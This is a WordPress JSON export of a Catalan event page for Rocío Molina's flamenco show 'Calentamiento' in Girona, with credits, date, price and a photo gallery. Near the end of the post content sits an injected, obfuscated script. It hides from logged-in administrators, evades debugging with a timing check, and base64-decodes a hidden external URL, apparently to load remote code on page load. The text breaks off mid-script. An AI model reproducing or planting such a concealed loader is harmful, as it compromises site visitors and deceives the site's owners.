{"id":2899,"date":"2026-08-29T11:13:09","date_gmt":"2026-08-29T09:13:09","guid":{"rendered":"https:\/\/flamengi.cat\/?p=2899"},"modified":"2026-09-01T14:03:56","modified_gmt":"2026-09-01T12:03:56","slug":"rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona","status":"publish","type":"post","link":"https:\/\/flamengi.cat\/es\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/","title":{"rendered":"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d<br> Jueves 26 de noviembre a las 20h en el Teatro Municipal de Girona"},"content":{"rendered":"\n\t\t<div id=\"fws_6a9bcdf23cc6b\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #412939; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col centered-text padding-5-percent inherit_tablet inherit_phone \"  data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-cta  alignment_tablet_default alignment_phone_default display_tablet_inherit display_phone_inherit \" data-color=\"accent-color\" data-using-bg=\"true\" data-style=\"arrow-animation\" data-display=\"inline\" data-alignment=\"left\" data-text-color=\"custom\" ><h4 style=\"color: #ffffff;\"><span class=\"link_wrap\" style=\"padding-top: 20px; padding-right: 40px; padding-bottom: 20px; padding-left: 40px;\"><a target=\"_blank\" class=\"link_text\" href=\"https:\/\/temporada-alta.com\/en\/shows\/calentamiento\/\"><span class=\"text\">Reserva d'entrades<\/span><svg class=\"next-arrow\" aria-hidden=\"true\" width=\"20px\" height=\"25px\" viewBox=\"0 0 50 80\" xml:space=\"preserve\">\n  <polyline stroke=\"#ffffff\" stroke-width=\"9\" fill=\"none\" stroke-linecap=\"round\" stroke-linejoin=\"round\" points=\"0, 0 45, 40 0, 80\"\/>\n  <\/svg>  <span class=\"line\"  style=\"background-color: #ffffff;\"><\/span> <\/a><\/span><\/h4><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcdf23d738\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-2-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><strong>Coorganitzat amb Temporada Alta<\/strong><\/p>\n<p><strong>Roc\u00edo Molina \u201cCalentamiento\u201d:<\/strong>\u00a0Desentumir els m\u00fasculs. Comunicar calor a un cos. Enardir alg\u00fa. Excitar-lo sexualment. Enfervorir-se. Aquestes, entre d\u2019altres, s\u00f3n paraules que el diccionari tria per definir la paraula \u201ccalentamiento\u201d. Totes ressonen en la nova obra de Roc\u00edo Molina. Tot just comen\u00e7ar \u2014o \u00e9s que ja havia comen\u00e7at?\u2014, Roc\u00edo ens explica que abans de comen\u00e7ar amb l\u2019escalfament far\u00e0 un escalfament previ a l\u2019escalfament, per comen\u00e7ar a escalfar-se abans de comen\u00e7ar. Aquest obrir-se a l\u2019infinit del comen\u00e7ament \u00e9s el de la vida dient-li a la mort que no \u00e9s que li tingui por, \u00e9s que ni tan sols ha comen\u00e7at a caminar el cam\u00ed. I com que cada principi comporta un final, aquest \u00abcalentamiento\u00bb no deixar\u00e0 de moure\u2019s en cercles buscant l\u2019alleujament. El trobar\u00e0 de vegades en la calma, de vegades en el treball, de vegades en el plaer, de vegades en el dolor, de vegades en solitud, de vegades en companyia. Per\u00f2 sempre, sempre, sempre, en no deixar que la festa s\u2019acabi. Jo no vull que la festa s\u2019acabi.<\/p>\n<p><strong>Ball:<\/strong> Roc\u00edo Molina<\/p>\n<p><strong>Int\u00e8rprets:<\/strong><\/p>\n<p><strong>En escena:<\/strong> Ana Polanco, Ana Salazar, Mar\u00eda del Tango, Gara Hern\u00e1ndez, Jos\u00e9 Manuel Ramos \u201cOruco\u201d<\/p>\n<p><strong>Direcci\u00f3 i coreografia:<\/strong> Roc\u00edo Molina<\/p>\n<p><strong>Codirecci\u00f3 i textos:<\/strong> Pablo Messiez<\/p>\n<p><strong>Direcci\u00f3 musical:<\/strong> \u201cNi\u00f1o de Elche\u201d<\/p>\n<p><strong>Disseny d\u2019il\u00b7luminaci\u00f3:<\/strong> Carlos Marquerie<\/p>\n<p><strong>Col\u00b7laboraci\u00f3 esc\u00e8nica:<\/strong> Cabo San Roque<\/p>\n<p><strong>Disseny i confecci\u00f3 de vestuari:<\/strong> Roberto Mart\u00ednez<\/p>\n<p><strong>Espai sonor i t\u00e8cnic de so:<\/strong> Javier \u00c1lvarez<\/p>\n<p><strong>Direcci\u00f3 t\u00e8cnica:<\/strong> Carmen Mori<\/p>\n<p><strong>T\u00e8cnic de llums:<\/strong> Rafael G\u00f3mez<\/p>\n<p><strong>Regidoria:<\/strong> Mar\u00eda Agar Mart\u00ednez<\/p>\n<p><strong>Fotografia sessi\u00f3 de fotos:<\/strong> Adrian @OffdelCampo<\/p>\n<p><strong>Direcci\u00f3 d\u2019art sessi\u00f3 de fotos:<\/strong> Roberto Mart\u00ednez<\/p>\n<p><strong>Muah sessi\u00f3 de fotos:<\/strong> Sarah Kceres<\/p>\n<p><strong>Vestit vermell sessi\u00f3 de fotos:<\/strong> Fernando Claro<\/p>\n<p><strong>Fotografia:<\/strong> Simone Fratini<\/p>\n<p><strong>Disseny gr\u00e0fic:<\/strong> Julia Valencia<\/p>\n<p><strong>Comunicaci\u00f3:<\/strong> \u00c1ngela Gentil<\/p>\n<p><strong>Traducci\u00f3 al franc\u00e8s per a subt\u00edtols:<\/strong> Christilla Vasserot<\/p>\n<p><strong>Construcci\u00f3 prisma:<\/strong> Grafidec Eventos<\/p>\n<p><strong>Tipologia:<\/strong> ball i m\u00fasica flamenca<\/p>\n<p><strong>Data i hora:<\/strong> 26 de novembre a les 20h<\/p>\n<p><strong>Espai:<\/strong> Teatre Municipal de Girona<\/p>\n<p><strong>Preu de l&#8217;entrada:<\/strong> Desde 25\u20ac<\/p>\n\t<\/div>\n<\/div>\n\n\n\n<div id=\"fws_6a9bcdf23ddf1\" data-midnight=\"\" data-column-margin=\"default\" class=\"wpb_row vc_row-fluid vc_row inner_row vc_row-o-equal-height vc_row-flex vc_row-o-content-middle\"  style=\"\"><div class=\"row-bg-wrap\"> <div class=\"row-bg\" ><\/div> <\/div><div class=\"row_col_wrap_12_inner col span_12  left\">\n\t<div style=\"\" class=\"vc_col-sm-12 wpb_column column_container vc_column_container col child_column padding-3-percent inherit_tablet inherit_phone \"  data-using-bg=\"true\" data-shadow=\"medium_depth\" data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"true\" data-bg-color=\"#573278\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" ><div class=\"column-bg-overlay-wrap column-bg-layer\" data-bg-animation=\"none\"><div class=\"column-bg-overlay\" style=\"opacity: 1; background-color: #573278;\"><\/div><\/div>\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<h3 style=\"color: #ffffff;\">Data: 26 de Novembre<br \/>\n<span style=\"color: #ffffff;\">Hora:<\/span> 20:00h<br \/>\n<span style=\"color: #ffffff;\">Lloc: <\/span>\u00a0Teatre Municipal de Girona<\/h3>\n\t<\/div>\n<\/div>\n\n\n\n\n\t\t<\/div> \n\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcdf23e5cb\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  top_margin_5pct scale_desktop_1-02 rotate_desktop_2deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02); \"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><div class=\"row-bg-overlay row-bg-layer\" style=\"\"><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"-2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"rtl\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcdf23ecf0\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  bottom_margin_5pct zindex-set scale_desktop_1-02 rotate_desktop_358deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02);  z-index: 20;\"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"ltr\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n\n<h2>ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d | Dijous 26 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcdf23f327\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-3-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n\t<div class=\"wpb_gallery wpb_content_element clearfix\">\n\t\t<div class=\"wpb_wrapper\"><div class=\"wpb_gallery_slidesnectarslider_style\" data-onclick=\"link_no\" data-interval=\"5\"><div class=\"nectar-slider-wrap\" style=\"height: 667pxpx\" data-flexible-height=\"\" data-overall_style=\"classic\" data-button-styling=\"btn_with_count\" data-fullscreen=\"false\"  data-full-width=\"false\" data-parallax=\"false\" data-autorotate=\"5500\" id=\"ns-id-6a9bcdf23fbd9\"><div class=\"swiper-container\" style=\"height: 667pxpx\"  data-loop=\"true\" data-height=\"667px\" data-bullets=\"\" data-bullet_style=\"see_through\" data-arrows=\"true\" data-desktop-swipe=\"true\" data-settings=\"\"><div class=\"swiper-wrapper\"><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/4E5-v13A.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/84_YkMtQ.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5503\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5524-2\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5540\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5558\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Q3BmgjsQ.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/r7-cFabn.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5079\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5081\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5135\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5177\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5411\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5430\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5487\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini-1.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_4846\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_4891\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_4929\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5025.\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5286\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/DSC_5520\u00a9-Simone-Fratini.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/VtzngCCJ.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/ysDLV1Gg.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/EaJMfCw.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/3OCnjUyQ-1.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/3OCnjUyQ.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/EZbHzJi_.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/nqSELNGa.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/OSuZBdSQ.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><\/div><a href=\"\" class=\"slider-prev\"><i class=\"icon-salient-left-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a>\n\t\t\t     \t\t<a href=\"\" class=\"slider-next\"><i class=\"icon-salient-right-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a><div class=\"nectar-slider-loading\"><\/div><\/div><\/div><\/div>\n\t\t<\/div> \n\t<\/div> \n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcdf30b691\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof 